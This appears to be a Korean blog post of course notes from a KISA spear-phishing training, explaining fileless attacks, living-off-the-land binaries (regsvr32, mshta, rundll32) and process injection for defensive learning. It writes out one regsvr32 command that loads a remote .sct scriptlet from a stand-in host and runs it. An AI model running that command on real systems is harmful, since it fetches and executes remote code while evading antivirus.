본문 바로가기

교육 및 자격증/KISA : 스피어피싱 기본

표적 공격

728x90

파일리스 공격

 : 실행되는 코드가 파일로 생성되지 않고 메모리에만 존재하며(DLL, EXE) 흔적을 남기 지 않는 공격

--> 목표는 디스크를 쓰지 않고 공격하겠다.

  특징

  • 프로셋 인젝션 기술 사용
  • LoL(Living off the Land)바이너리들을 사용

마이터어택 프레임워크로 공격이 어려워지니 공격자들이 이미 운영체제에 있는 바이너리, 스크립트, 그리고 라이브러리 등을 이용해 공격한다. 이를 LOLBINS 공격이라함.

[regsvr32.exe : DLL과 ActiveX를 등록하거나 등록해지하는데 사용되는 프로그램]

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
다음과 같이 외부 호스트에서 .sct파일을 불러오고 내장된 script로 실행
/s : 어떠한 메시지 박스도 디스플레이 하지 않음
/n : DLL 등록 서버를 호출하지 않음
/I : 등록될 DLL에게 전달될 명령라인 파라미터 혹은 옵션
/u : DLL을 서비스로 등록 하지 않음

[mshta.exe : html application을 실행시킴]

[rundll32.exe : dll을 실행시킴]

  • 스크립팅
  • 파일리스 퍼시스턴스(persistence)

안티 바이러스 입장 - regsvr32.exe가 잠깐 실행됐다가 종료되어 정상인지 악성인지 파악하기 어려움

 

프로세스 인젝션

 : 정상적인 프로세스의 유저 메모리 영역에 악성 코드를 주입한 후 실행하는 공격

악성 dll을 주입 후 실행된 프로세스는 삭제됨.

 

프로세스 인젝션 의심 함수[VirtualAllocEx, WriteProcessMemory..]

 

 

참고

https://lolbas-project.github.io/

https://www.xn--hy1b43d247a.com/execution/lolbas

 

 

 

'교육 및 자격증 > KISA : 스피어피싱 기본' 카테고리의 다른 글

악성 HWP 문서 분석  (0) 2023.10.24
쉘코드 분석  (0) 2023.10.24
스피어피싱 이메일 분석  (0) 2023.10.24
KISA : 스피어피싱 기본  (0) 2023.10.23